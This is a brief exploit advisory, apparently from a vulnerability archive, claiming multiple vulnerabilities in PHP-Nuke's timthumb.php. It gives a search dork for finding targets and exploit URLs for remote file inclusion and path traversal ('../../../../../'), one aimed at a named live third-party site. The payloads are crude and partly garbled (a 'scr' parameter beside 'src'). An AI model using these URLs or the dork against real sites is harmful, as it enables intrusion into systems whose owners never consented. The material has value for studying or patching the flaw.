PHP NUKE ALL VERSION MULTI VULNERABILITY

2012-07-11T00:00:00
ID SECURITYVULNS:DOC:28282
Type securityvulns
Reporter Securityvulns
Modified 2012-07-11T00:00:00

Description

Exploit Title : PHP NUKE ALL VERSION MULTI VULNERABILITY

Author : Iranian Security & Research Team

Discovered By : Nafsh

Home : sec-lab.ir

Contact : research [at] sec-lab [dot] ir

Date : 23/1/2012 - 19:30

Software Link : www.phpnuke.ir

Security Risk : High

DorK : "PHP-Nuke Farsi"

Expl0iTs:

http://[TARGET]/includes/timthumb.php?scr=EV!L PAGE

http://[TARGET]/includes/timthumb.php?scr=../../../../../GOLD FILE

http://worldart.ir/includes/timthumb.php?src=modules/MT-Gallery/images//03.jpg&q=90&

w=500

We are : K0242 | Nafsh | Ehram.shahmohamadi

Greetz : All sec-lab researchers